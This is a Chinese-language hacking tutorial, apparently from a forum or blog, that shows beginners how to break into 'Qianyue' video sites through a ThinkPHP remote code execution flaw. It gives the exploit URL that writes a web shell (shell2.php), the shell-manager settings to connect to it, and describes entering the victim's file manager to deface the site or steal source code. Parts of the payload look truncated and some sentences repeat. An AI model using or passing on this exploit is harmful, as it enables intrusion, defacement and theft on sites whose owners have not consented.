教程简单小白易懂

本教程全网首发！

我们是利用千月tp框架漏洞直接注入提权，网上的千月影视基本都没修复这个漏洞。

1.域名/+?s=/index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell2.php&vars[1][]=2%203%204%205%206%207%20

运行完这段代码结果显示101就是可以入侵3.url填: 域名/shell2.php

类型: php

密码: x

编码: utf-8

电脑版配置图:

最后我们直接进了他的文件管理,用来挂黑偷源码什么都可以最后我们直接进了他的文件管理,用来挂黑偷源码什么都可以手机版配置:

最后我们直接进了他的文件管理,用来挂黑偷源码什么都可以最后我们直接进了他的文件管理,用来挂黑偷源码什么都可以工具:抱歉，隐藏内容 回复 后刷新可见

分享到：

赞 (1) 打赏 搜一下